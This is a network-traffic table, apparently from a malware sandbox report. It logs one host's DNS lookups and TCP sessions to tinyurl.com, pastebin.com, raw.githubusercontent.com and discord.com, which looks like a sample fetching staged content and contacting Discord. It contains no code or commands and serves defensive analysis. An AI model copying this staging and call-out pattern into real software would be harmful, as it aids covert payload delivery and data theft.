Oct 15, 2024 16:00:01.372368097 CEST | 49763 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:01.372535944 CEST | 49763 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:01.372549057 CEST | 443 | 49763 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:01.376822948 CEST | 80 | 49757 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:02.206841946 CEST | 443 | 49763 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:02.206948042 CEST | 49763 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:02.208838940 CEST | 49763 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:02.208883047 CEST | 443 | 49763 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:02.209722996 CEST | 443 | 49763 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:02.210874081 CEST | 49763 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:02.255414963 CEST | 443 | 49763 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:02.336810112 CEST | 443 | 49763 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:02.336893082 CEST | 443 | 49763 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:02.336929083 CEST | 443 | 49763 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:02.336962938 CEST | 49763 | 443 | 192.168.2.6 | 185.199.109.133
                                                            Oct 15, 2024 16:00:02.336997986 CEST44349763185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:02.337044954 CEST49763443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:02.337201118 CEST44349763185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:02.337543011 CEST44349763185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:02.337590933 CEST49763443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:02.337595940 CEST44349763185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:02.337635994 CEST49763443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:02.371541977 CEST49763443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:14.926139116 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:14.926172018 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:14.926248074 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:14.926711082 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:14.926721096 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:15.550414085 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:15.550508022 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:15.552896976 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:15.552910089 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:15.553211927 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:15.558527946 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:15.603406906 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:15.603470087 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:15.603483915 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:15.804527044 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:15.804595947 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:15.804647923 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:15.811532974 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:20.943571091 CEST4974680192.168.2.6104.17.112.233
                                                            Oct 15, 2024 16:00:23.738998890 CEST4988180192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:23.744002104 CEST8049881172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:23.744081974 CEST4988180192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:23.747190952 CEST4988180192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:23.752228022 CEST8049881172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:24.372405052 CEST8049881172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:24.408894062 CEST49885443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:24.408917904 CEST44349885172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:24.408973932 CEST49885443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:24.412473917 CEST49885443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:24.412491083 CEST44349885172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:24.427001953 CEST4988180192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:24.791786909 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.791827917 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:24.791884899 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.792280912 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.792293072 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:24.835525990 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.835565090 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:24.835738897 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.836108923 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.836119890 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:24.843242884 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.843254089 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:24.843311071 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.843672991 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.843683958 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.042205095 CEST44349885172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:25.042296886 CEST49885443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:25.047880888 CEST49885443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:25.047898054 CEST44349885172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:25.048206091 CEST44349885172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:25.063615084 CEST49885443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:25.107424021 CEST44349885172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:25.208010912 CEST44349885172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:25.208123922 CEST44349885172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:25.208200932 CEST49885443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:25.218395948 CEST49885443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:25.231405973 CEST4989480192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:25.236310005 CEST8049894185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:25.237832069 CEST4989480192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:25.237832069 CEST4989480192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:25.242763042 CEST8049894185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:25.430219889 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.430321932 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.431643009 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.431651115 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.431982040 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.439877033 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.462430000 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.462527037 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.464176893 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.464185953 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.464437962 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.467943907 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.468060017 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.472271919 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.473377943 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.473385096 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.473745108 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.481935978 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.483413935 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.483479977 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.483498096 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.519399881 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.519478083 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.519484997 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.527400017 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.527488947 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.527497053 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.665034056 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.665102959 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.665179968 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.667272091 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.701997995 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.702058077 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.702244997 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.704128027 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.715435028 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.715507984 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.715564966 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.717662096 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:26.832339048 CEST8049894185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:26.832544088 CEST8049894185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:26.832568884 CEST4989480192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:26.832592964 CEST4989480192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:26.832803965 CEST8049894185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:26.832998037 CEST4989480192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:26.833522081 CEST8049894185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:26.834014893 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:26.834045887 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:26.834070921 CEST4989480192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:26.834104061 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:26.834439993 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:26.834446907 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:26.834574938 CEST8049894185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:26.834649086 CEST4989480192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:26.840101957 CEST8049894185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.460865021 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.460948944 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:27.463776112 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:27.463788986 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.464036942 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.465332985 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:27.507409096 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.589804888 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.589901924 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.589936972 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.589976072 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:27.589993000 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.590104103 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:27.590429068 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.590480089 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.590534925 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.590576887 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:27.614614010 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:30.701647043 CEST4972880192.168.2.6104.17.112.233
                                                            Oct 15, 2024 16:00:30.767364979 CEST4972980192.168.2.6104.17.112.233
                                                            Oct 15, 2024 16:00:30.781321049 CEST4972780192.168.2.6104.17.112.233
                                                            Oct 15, 2024 16:00:31.873744965 CEST4992680192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:31.878659010 CEST8049926172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:31.878863096 CEST4992680192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:31.882006884 CEST4992680192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:31.886787891 CEST8049926172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:32.495598078 CEST8049926172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:32.526787996 CEST49932443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:32.526804924 CEST44349932172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:32.527327061 CEST49932443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:32.536262989 CEST4992680192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:32.638179064 CEST49932443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:32.638196945 CEST44349932172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:33.275880098 CEST44349932172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:33.275953054 CEST49932443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:33.277676105 CEST49932443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:33.277683020 CEST44349932172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:33.277911901 CEST44349932172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:33.284003019 CEST49932443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:33.331404924 CEST44349932172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:33.455986023 CEST44349932172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:33.456073999 CEST44349932172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:33.456144094 CEST49932443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:33.467989922 CEST49932443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:33.494296074 CEST4993880192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:33.499531031 CEST8049938185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:33.499727011 CEST4993880192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:33.499825001 CEST4993880192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:33.504734039 CEST8049938185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.105288029 CEST8049938185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.105582952 CEST4993880192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.106259108 CEST8049938185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.106398106 CEST4993880192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.106463909 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.106503963 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.106575012 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.106833935 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.106853962 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.110455036 CEST8049938185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.726484060 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.726577997 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.728061914 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.728075981 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.728315115 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.733268023 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.775449038 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.865080118 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.865128994 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.865149021 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.865173101 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.865195036 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.865197897 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.865227938 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.865240097 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.865313053 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.865319967 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.871711016 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.871834040 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.917110920 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:40.124465942 CEST49971443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:40.124528885 CEST44349971162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:40.124615908 CEST49971443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:40.124947071 CEST49971443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:40.124964952 CEST44349971162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:40.777465105 CEST44349971162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:40.777565002 CEST49971443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:40.779262066 CEST49971443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:40.779288054 CEST44349971162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:40.779545069 CEST44349971162.159.136.232192.168.2.6
Oct 15, 2024 16:00:40.780528069 CEST | 49971 | 443 | 192.168.2.6 | 162.159.136.232
Oct 15, 2024 16:00:40.823410034 CEST | 443 | 49971 | 162.159.136.232 | 192.168.2.6
Oct 15, 2024 16:00:40.823470116 CEST | 49971 | 443 | 192.168.2.6 | 162.159.136.232
Oct 15, 2024 16:00:40.823493958 CEST | 443 | 49971 | 162.159.136.232 | 192.168.2.6
Oct 15, 2024 16:00:41.031773090 CEST | 443 | 49971 | 162.159.136.232 | 192.168.2.6
Oct 15, 2024 16:00:41.031841040 CEST | 443 | 49971 | 162.159.136.232 | 192.168.2.6
Oct 15, 2024 16:00:41.031893969 CEST | 49971 | 443 | 192.168.2.6 | 162.159.136.232
Oct 15, 2024 16:00:41.033967972 CEST | 49971 | 443 | 192.168.2.6 | 162.159.136.232
Oct 15, 2024 16:00:46.195039988 CEST | 49881 | 80 | 192.168.2.6 | 172.67.19.24
Oct 15, 2024 16:00:47.537796021 CEST | 50012 | 443 | 192.168.2.6 | 162.159.136.232
Oct 15, 2024 16:00:47.537846088 CEST | 443 | 50012 | 162.159.136.232 | 192.168.2.6
Oct 15, 2024 16:00:47.537924051 CEST | 50012 | 443 | 192.168.2.6 | 162.159.136.232
Oct 15, 2024 16:00:47.538311005 CEST | 50012 | 443 | 192.168.2.6 | 162.159.136.232
Oct 15, 2024 16:00:47.538322926 CEST | 443 | 50012 | 162.159.136.232 | 192.168.2.6
Oct 15, 2024 16:00:48.153739929 CEST | 443 | 50012 | 162.159.136.232 | 192.168.2.6
Oct 15, 2024 16:00:48.153821945 CEST | 50012 | 443 | 192.168.2.6 | 162.159.136.232
Oct 15, 2024 16:00:48.155211926 CEST | 50012 | 443 | 192.168.2.6 | 162.159.136.232
Oct 15, 2024 16:00:48.155220985 CEST | 443 | 50012 | 162.159.136.232 | 192.168.2.6
Oct 15, 2024 16:00:48.155479908 CEST | 443 | 50012 | 162.159.136.232 | 192.168.2.6
Oct 15, 2024 16:00:48.156297922 CEST | 50012 | 443 | 192.168.2.6 | 162.159.136.232
Oct 15, 2024 16:00:48.199402094 CEST | 443 | 50012 | 162.159.136.232 | 192.168.2.6
Oct 15, 2024 16:00:48.202044010 CEST | 50012 | 443 | 192.168.2.6 | 162.159.136.232
Oct 15, 2024 16:00:48.202069998 CEST | 443 | 50012 | 162.159.136.232 | 192.168.2.6
Oct 15, 2024 16:00:48.382080078 CEST | 443 | 50012 | 162.159.136.232 | 192.168.2.6
Oct 15, 2024 16:00:48.382143974 CEST | 443 | 50012 | 162.159.136.232 | 192.168.2.6
Oct 15, 2024 16:00:48.382231951 CEST | 50012 | 443 | 192.168.2.6 | 162.159.136.232
Oct 15, 2024 16:00:48.384340048 CEST | 50012 | 443 | 192.168.2.6 | 162.159.136.232
Oct 15, 2024 16:00:53.418826103 CEST | 49926 | 80 | 192.168.2.6 | 172.67.19.24
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 15:59:57.439223051 CEST | 54167 | 53 | 192.168.2.6 | 1.1.1.1
Oct 15, 2024 15:59:57.446043015 CEST | 53 | 54167 | 1.1.1.1 | 192.168.2.6
Oct 15, 2024 15:59:58.104053974 CEST | 61670 | 53 | 192.168.2.6 | 1.1.1.1
Oct 15, 2024 15:59:58.111968040 CEST | 53 | 61670 | 1.1.1.1 | 192.168.2.6
Oct 15, 2024 15:59:59.136423111 CEST | 59375 | 53 | 192.168.2.6 | 1.1.1.1
Oct 15, 2024 15:59:59.145500898 CEST | 53 | 59375 | 1.1.1.1 | 192.168.2.6
Oct 15, 2024 16:00:14.917185068 CEST | 58835 | 53 | 192.168.2.6 | 1.1.1.1
Oct 15, 2024 16:00:14.925441027 CEST | 53 | 58835 | 1.1.1.1 | 192.168.2.6
Oct 15, 2024 16:00:23.725825071 CEST | 61706 | 53 | 192.168.2.6 | 1.1.1.1
Oct 15, 2024 16:00:23.732774019 CEST | 53 | 61706 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 15, 2024 15:59:57.439223051 CEST | 192.168.2.6 | 1.1.1.1 | 0x8d86 | Standard query (0) | tinyurl.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:58.104053974 CEST | 192.168.2.6 | 1.1.1.1 | 0x5648 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:59.136423111 CEST | 192.168.2.6 | 1.1.1.1 | 0x2be3 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:14.917185068 CEST | 192.168.2.6 | 1.1.1.1 | 0xc870 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:23.725825071 CEST | 192.168.2.6 | 1.1.1.1 | 0xf47f | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 15, 2024 15:59:53.046111107 CEST | 1.1.1.1 | 192.168.2.6 | 0x8afb | No error (0) | shed.dual-low.s-part-0032.t-0009.t-msedge.net | s-part-0032.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 15, 2024 15:59:53.046111107 CEST | 1.1.1.1 | 192.168.2.6 | 0x8afb | No error (0) | s-part-0032.t-0009.t-msedge.net | | 13.107.246.60 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:57.446043015 CEST | 1.1.1.1 | 192.168.2.6 | 0x8d86 | No error (0) | tinyurl.com | | 104.17.112.233 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:57.446043015 CEST | 1.1.1.1 | 192.168.2.6 | 0x8d86 | No error (0) | tinyurl.com | | 104.18.111.161 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:58.111968040 CEST | 1.1.1.1 | 192.168.2.6 | 0x5648 | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:58.111968040 CEST | 1.1.1.1 | 192.168.2.6 | 0x5648 | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:58.111968040 CEST | 1.1.1.1 | 192.168.2.6 | 0x5648 | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:59.145500898 CEST | 1.1.1.1 | 192.168.2.6 | 0x2be3 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:59.145500898 CEST | 1.1.1.1 | 192.168.2.6 | 0x2be3 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:59.145500898 CEST | 1.1.1.1 | 192.168.2.6 | 0x2be3 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:59:59.145500898 CEST | 1.1.1.1 | 192.168.2.6 | 0x2be3 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:14.925441027 CEST | 1.1.1.1 | 192.168.2.6 | 0xc870 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:14.925441027 CEST | 1.1.1.1 | 192.168.2.6 | 0xc870 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:14.925441027 CEST | 1.1.1.1 | 192.168.2.6 | 0xc870 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:14.925441027 CEST | 1.1.1.1 | 192.168.2.6 | 0xc870 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:14.925441027 CEST | 1.1.1.1 | 192.168.2.6 | 0xc870 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:23.732774019 CEST | 1.1.1.1 | 192.168.2.6 | 0xf47f | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:23.732774019 CEST | 1.1.1.1 | 192.168.2.6 | 0xf47f | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:00:23.732774019 CEST | 1.1.1.1 | 192.168.2.6 | 0xf47f | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
• pastebin.com
• raw.githubusercontent.com
• discord.com
• tinyurl.com
